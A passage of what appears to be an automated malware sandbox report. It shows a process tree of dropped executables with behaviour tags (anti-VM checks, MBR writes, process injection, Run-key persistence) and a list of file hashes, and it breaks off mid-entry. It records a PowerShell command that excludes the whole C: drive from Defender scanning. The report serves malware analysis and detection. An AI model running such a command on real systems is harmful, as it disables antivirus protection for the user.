                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:8
                                                                    12⤵
                                                                      PID:5956
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6020 /prefetch:8
                                                                      12⤵
                                                                        PID:5612
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6120,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:8
                                                                        12⤵
                                                                          PID:6056
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6180,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:8
                                                                          12⤵
                                                                            PID:4744
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6504,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:8
                                                                            12⤵
                                                                              PID:3616
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6600,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:8
                                                                              12⤵
                                                                                PID:208
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6760,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6772 /prefetch:8
                                                                                12⤵
                                                                                  PID:1020
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6920,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6928 /prefetch:8
                                                                                  12⤵
                                                                                    PID:1860
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7080,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=6908 /prefetch:8
                                                                                    12⤵
                                                                                      PID:5484
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7112,i,5539906667528536945,2167126295681694220,262144 --variations-seed-version --mojo-platform-channel-handle=7232 /prefetch:8
                                                                                      12⤵
                                                                                        PID:5472
                                                                              • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5300
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                  9⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:5344
                                                                              • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                                                8⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:4476
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                  9⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:6048
                                                                          • C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\10473310101\UZPt0hR.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:412
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                              7⤵
                                                                                PID:1924
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                  8⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:5064
                                                                              • C:\Windows\system32\svchost.exe
                                                                                "C:\Windows\system32\svchost.exe"
                                                                                7⤵
                                                                                • Downloads MZ/PE file
                                                                                • Adds Run key to start application
                                                                                PID:1496
                                                                                • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                  8⤵
                                                                                  • Deletes itself
                                                                                  • Executes dropped EXE
                                                                                  PID:5828
                                                                                • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                  "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                  8⤵
                                                                                  • Sets service image path in registry
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious behavior: LoadsDriver
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4056
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Remove-MpPreference -ExclusionPath C:\
                                                                                    9⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4588
                                                                            • C:\Users\Admin\AppData\Local\Temp\10473320101\a244d4f733.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10473320101\a244d4f733.exe"
                                                                              6⤵
                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                              • Checks BIOS information in registry
                                                                              • Executes dropped EXE
                                                                              • Identifies Wine through registry keys
                                                                              • Writes to the Master Boot Record (MBR)
                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1852
                                                                            • C:\Users\Admin\AppData\Local\Temp\10473330101\21b4bde783.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10473330101\21b4bde783.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5196
                                                                              • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\10473330101\21b4bde783.exe"
                                                                                7⤵
                                                                                • Executes dropped EXE
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1060
                                                                            • C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\10473340101\RYZusWg.exe"
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:6972
                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2T1218.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2T1218.exe
                                                                          4⤵
                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                          • Checks BIOS information in registry
                                                                          • Executes dropped EXE
                                                                          • Identifies Wine through registry keys
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4280
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                      2⤵
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2488
                                                                      • C:\Windows\system32\rundll32.exe
                                                                        rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                        3⤵
                                                                          PID:3520
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
                                                                        2⤵
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:3764
                                                                        • C:\Windows\system32\rundll32.exe
                                                                          rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
                                                                          3⤵
                                                                            PID:1932
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          2⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4992
                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          2⤵
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4928
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                          2⤵
                                                                            PID:4988
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                            2⤵
                                                                              PID:5072
                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                            1⤵
                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                            • Checks BIOS information in registry
                                                                            • Executes dropped EXE
                                                                            • Identifies Wine through registry keys
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:3764
                                                                          • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                            "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                            1⤵
                                                                              PID:4376
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                              1⤵
                                                                                PID:3632
                                                                              • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                1⤵
                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                • Checks BIOS information in registry
                                                                                • Executes dropped EXE
                                                                                • Identifies Wine through registry keys
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:5884
                                                                              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:5916
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                1⤵
                                                                                  PID:5752
                                                                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:13296
                                                                                • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                  1⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:5640

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                  Filesize

                                                                                  649B

                                                                                  MD5

                                                                                  84b14e522ce322f47ee327cbba9bb427

                                                                                  SHA1

                                                                                  051ffd7e0b6d8d8491634c0a9c4e47d4f5b3d33c

                                                                                  SHA256

                                                                                  e3ce92fc05fd708731a03f2480ab9c8c83943366f8b33a854fc4434458d3735f

                                                                                  SHA512

                                                                                  ee08e7c4aae70cb1baaa02a04f43eed00a8120d43e730121c9b7c5e9486f092ccf392961a2c17223a464292b9455d50e755c93ad954fed19689e16263679655b

                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                  Filesize

                                                                                  80KB

                                                                                  MD5

                                                                                  b3ff8104be5855eb281e568ea56ec0fb

                                                                                  SHA1

                                                                                  55a3488ba4214c549e7a3bf465b19d358425e655

                                                                                  SHA256

                                                                                  11512cddf6a7cd3bf1da66b4e662e44580b4c83da26c0d6e652eae8c77c4df57

                                                                                  SHA512

                                                                                  094681124202f5430be2c83465840f359f12d214acbaa939e5e10e00532187bc3bf8b7e9f4427f3d4d4b5cd533cceba7a81f7d632f7c96b4bdff82365cbf2bb7

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                  Filesize

                                                                                  280B

                                                                                  MD5

                                                                                  8734b4a181214bb62f91cfa36c7e2c98

                                                                                  SHA1

                                                                                  9cff323f10778a23d73ac3dcffc038d3bf661b78

                                                                                  SHA256

                                                                                  e06afe980fa56c8dad3e7c6b8d0d8f1e7eb9a4860ac715e966026fb7631c3ba5

                                                                                  SHA512

                                                                                  e8648a54da9aa24b6cba1f0377a0ce33979ea097554bb6347f252cad894ad4134e1fe839abc80eb48e2510061d5c6937e80374d32f95afd4cc8567b57694ac36

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                  Filesize

                                                                                  280B

                                                                                  MD5

                                                                                  0db1d88802048ff847bfcf47035335bd

                                                                                  SHA1

                                                                                  bb54059e5b145da464f6521ae67353889ce00771

                                                                                  SHA256

                                                                                  416525d2bfeaeab0950175c0eab55ad35e84518ef5299f10565023800788cf9a

                                                                                  SHA512

                                                                                  32c5b42febdb38c3a30eb5179b8aa20a5e731b0e83aab16ec73d27b4108bfc89eb6316f71a988388cb5df19267ba823f6d0220fab5584667ba0adb0da1152a30

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\67fa95f4-0bf3-4fe7-bed9-b5f3b1166a2b.tmp

                                                                                  Filesize

                                                                                  1B

                                                                                  MD5

                                                                                  5058f1af8388633f609cadb75a75dc9d

                                                                                  SHA1

                                                                                  3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                  SHA256

                                                                                  cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                  SHA512

                                                                                  0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                  Filesize

                                                                                  69KB

                                                                                  MD5

                                                                                  164a788f50529fc93a6077e50675c617

                                                                                  SHA1

                                                                                  c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                                                                  SHA256

                                                                                  b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                                                                  SHA512

                                                                                  ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js

                                                                                  Filesize

                                                                                  9KB

                                                                                  MD5

                                                                                  3d20584f7f6c8eac79e17cca4207fb79

                                                                                  SHA1

                                                                                  3c16dcc27ae52431c8cdd92fbaab0341524d3092

                                                                                  SHA256

                                                                                  0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643

                                                                                  SHA512

                                                                                  315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                  Filesize

                                                                                  107KB

                                                                                  MD5

                                                                                  2b66d93c82a06797cdfd9df96a09e74a

                                                                                  SHA1

                                                                                  5f7eb526ee8a0c519b5d86c845fea8afd15b0c28

                                                                                  SHA256

                                                                                  d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954

                                                                                  SHA512

                                                                                  95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                  Filesize

                                                                                  2B

                                                                                  MD5

                                                                                  d751713988987e9331980363e24189ce

                                                                                  SHA1

                                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                                  SHA256

                                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                  SHA512

                                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                                  Filesize

                                                                                  4KB

                                                                                  MD5

                                                                                  522ea261c598a121ce82695d439107c1

                                                                                  SHA1

                                                                                  fd6885d4a5b0cc3198c017a46e1ea59fa90068d0

                                                                                  SHA256

                                                                                  ca46ccbd46d94a46b5e30ccf36e02e612bc63897a1c8a2ca919f295e008a2630

                                                                                  SHA512

                                                                                  a3be81259f473759ecd4204b11ad203b03f8328db950d238cc1419082d26a5400eada38b0462574aeac00f457fe81b0d9a1aea401f7c0a80fc181fa2ab456b70

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                  Filesize

                                                                                  6KB

                                                                                  MD5

                                                                                  facaaae64df2790f921d509d860930f0

                                                                                  SHA1

                                                                                  51b89f748d99ea2a249f97e7d6d490fc63a2b1c8

                                                                                  SHA256

                                                                                  6824dedd32328aa0f01cd15a6862f7d325280e12eccf96b90edd4a4b3432d145

                                                                                  SHA512

                                                                                  c2101b6a2cb3689c4fba33b72dd3d96acce94810bb4d1e5c74d0cca7f18f0fa40d329d4cf5e14805ea081b884b019e5431031db08aa11015b61ba7bfed31ca06

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                  Filesize

                                                                                  7KB

                                                                                  MD5

                                                                                  169ba0e2902ef21e9df41b09bcb0a231

                                                                                  SHA1

                                                                                  ea1d38270e7dbd258b572e080e529c36c047a727

                                                                                  SHA256

                                                                                  72ce00e45da028ed10f3a7fde47beccefb0f0bdab2f667ebceacf16abc6f90af

                                                                                  SHA512

                                                                                  66c727ccfbfefa2e6be1f14d94d26e1a652a7b957d88e1ba6f6419c130b50a6acb4330cae5f0037e0364c01b840a3da0fdef68acf1e3bddeba634c36787ccebb

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                  Filesize

                                                                                  2KB

                                                                                  MD5

                                                                                  aaa0684b5d6ace212fd4f0e89001c174

                                                                                  SHA1

                                                                                  726d393344280c285fe0db1fd978bce0316c5243

                                                                                  SHA256

                                                                                  5176aef47c4e0eebd9c43b4e078cbee38135a75dc82f134fc95e459db41e710f

                                                                                  SHA512

                                                                                  db75be0989dd703c26aa859242066365224890d5263eef77452d933d8bcc7e27ab6ab552d7ed3f47571f9361d8cc7332e518e0fb60ba7dde8216782b89262150

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Filesize

                                                                                  16KB

                                                                                  MD5

                                                                                  f17f66309e2df146be1c25dfe6db9afe

                                                                                  SHA1

                                                                                  7f5b6ac15f0cc52909dd5be6f626245fb2d7a37e

                                                                                  SHA256

                                                                                  9449fec4e50f85ef15e61461e407d1a652e4ecb6750d64b4fcf1229b413e7d2b

                                                                                  SHA512

                                                                                  7f86c70a4b21abd4e374c912357aa014e26c8521c7e7768de3ec639d083e703272e3ca2259292f65bf8d701c16738ca6cf4b6ccab23935dcf2090f87ccf63e88

                                                                                • C:\Users\Admin\AppData\Local\Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE

                                                                                  Filesize

                                                                                  1.8MB

                                                                                  MD5

                                                                                  0d397828202c894e2ef844b26e254853

                                                                                  SHA1

                                                                                  643c9fa847acfab19a151de57596d88be6d5fd11

                                                                                  SHA256

                                                                                  d26022e6a7e6e4fc7daba48705a49845fe73acd2630d577937cde2c9948b4614

                                                                                  SHA512

                                                                                  5bd441e7357ff7ef1367e5257bc569ec43f365cd80e95629138644e593d93b458f76aa7339468e2e175362b0f6013e12f71906218ebf532aeaf09347f1ec6661

                                                                                • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe

                                                                                  Filesize

                                                                                  360KB

                                                                                  MD5

                                                                                  cbc01fb7800453f31807a3c8c53ce422

                                                                                  SHA1

                                                                                  a1b48d519d0f4b2d375d2e0f72c8f6076f63f7f6

                                                                                  SHA256

                                                                                  f6fbc80ec9718b3ad7fe6f0de73aedf067d1d43a283f677b58ae9f5d283560ca

                                                                                  SHA512

                                                                                  ad368855a6a49eb28325799cc5759b2d28b842da85209721d57c6770bff6d18f3a6b1fcc5146568c8ec98ff179c226da366a7ff3ab6032b164f85ba4ab26c4c9

                                                                                • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe

                                                                                  Filesize

                                                                                  1.9MB

                                                                                  MD5

                                                                                  1c1602475ec7a0aa4e5450a11dd8870f

                                                                                  SHA1

                                                                                  fcb574a067e4b40feea92b296234dc037fabb7aa

                                                                                  SHA256

                                                                                  d522f1e3faa457f26102b3b10b2281863d5282d4c68151eb5bd89096b9d99a92

                                                                                  SHA512

                                                                                  7fd0be5da736ef645fb906eb0aca28e212a2bc6778efb554bd3d6a4e58bce2b140e43e452e74a1f5444ea7e1939e59bdfa09f83ed435dfb465e706d32504ebd7

                                                                                • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe

                                                                                  Filesize

                                                                                  240KB

                                                                                  MD5

                                                                                  63947da15b08c252790ae01f3d890717

                                                                                  SHA1

                                                                                  44181bcb16c557db93bc10b5a403e51160c04004

                                                                                  SHA256

                                                                                  c8acfafffa48acd8d6fdabb906345746bcdbbe89dcec5bb3a3b60ce371dd795e

                                                                                  SHA512

                                                                                  a17560c0770a4abad3fbc6df6703fee03f05e8208099fb897ea417e9d6e563e10fc990e98633da21863db37002807230d3f4ee5b5d484c0339c3b7fd0ef7b9b9

                                                                                • C:\Users\Admin\AppData\Local\Temp\10469560101\YMauSAr.exe

                                                                                  Filesize

                                                                                  7.8MB

                                                                                  MD5

                                                                                  9e7b72fc6d4a6b523db31a92955fb0af

                                                                                  SHA1

                                                                                  476824befa9db5c437a0a3e322219a42f0326da2

                                                                                  SHA256

                                                                                  7a877c8cab63651290d7fba73619a22157de658f056c708c154bb04bea3ceb7e

                                                                                  SHA512

                                                                                  6d04ea169193da8b4e30fc0c683e74ee45090a82987301f139d84e5a4202a633f646661a7bd9762d3643cff904dfb3d23b397a2983032c2025313fbd8fa80b9c

                                                                                • C:\Users\Admin\AppData\Local\Temp\10472140101\VrQSuEQ.exe

                                                                                  Filesize

                                                                                  584KB

                                                                                  MD5

                                                                                  c5d9e2e38334a86e8f50dfb92e895e11

                                                                                  SHA1

                                                                                  723b222dce3677b76fda3754c7d58dcf60a7ee3a

                                                                                  SHA256

                                                                                  4d78fb22cc89fa243a5b356ee029331d52e047aac72595fb2d0e66fc6d2943dd

                                                                                  SHA512

                                                                                  65952a94ab63f509b98211db5f5544f8d962e0f9441381be0584498e5031adb5259d5ea3ab79804ed685ebd2ba162612f519bdbd580aa21d0352e1a3f05103b1

                                                                                • C:\Users\Admin\AppData\Local\Temp\10473240101\wQI4o11.exe

                                                                                  Filesize

                                                                                  5.5MB

                                                                                  MD5

                                                                                  d66272143362242811fc9849c98b47b5

                                                                                  SHA1

                                                                                  17194970bbfe4ef0402f413fce909c3ae57e5342

                                                                                  SHA256

                                                                                  c29d978e33e1d80eb188cff6ebebd0a576480871a0c173f8132a7b14383a50a9

                                                                                  SHA512

                                                                                  9aa0267466e63c69c651a5ffd9fb0ea8285bcf7f6b6a2d72d53e8af04c8077aca2b4839d5721a9ec4a3a55a4a6675cc4e1a9950ae4f85e67bf9b6e19d1a772dd

                                                                                • C:\Users\Admin\AppData\Local\Temp\10473260101\43ee895fb1.exe

                                                                                  Filesize

                                                                                  938KB

                                                                                  MD5

                                                                                  80c49aa4e5d9835db12f5b1f3e52136b

                                                                                  SHA1

                                                                                  22d16ccc02ab2f797e948dac092666a952269f13

                                                                                  SHA256

                                                                                  ec17595441a9f813ecd87ac3655a6ef4cd50721a01813375d9680a3ac00fa225

                                                                                  SHA512

                                                                                  36e08978a6c479f9beff746728914436cffe098bf3286f28c08ba7603e00a737a7a605960fd5dc447d4ada1ccbadb5d829ad262ec3036b463965499e57dd7129

                                                                                • C:\Users\Admin\AppData\Local\Temp\10473270101\dfaa94e428.exe

                                                                                  Filesize

                                                                                  1.8MB

                                                                                  MD5

                                                                                  e5ce7c7822d6ae95ea7df9a6bec47195

                                                                                  SHA1

                                                                                  1d52d18943beed15b7354731c7073ca0e05bd991

                                                                                  SHA256

                                                                                  d774cec2801f9e42a38553dcc558e80cdd83b5e89aebde3a6528d695f105b85a

                                                                                  SHA512

                                                                                  68f5d360a1e8c505431238b825fe8d0c461e99fc78884005517fec13d5a494ddb771a06a8bdc544e734744b90b9ef223284ef6f6d77c67f70666728599cae562

                                                                                • C:\Users\Admin\AppData\Local\Temp\10473300101\amnew.exe

                                                                                  Filesize

                                                                                  429KB

                                                                                  MD5

                                                                                  22892b8303fa56f4b584a04c09d508d8

                                                                                  SHA1

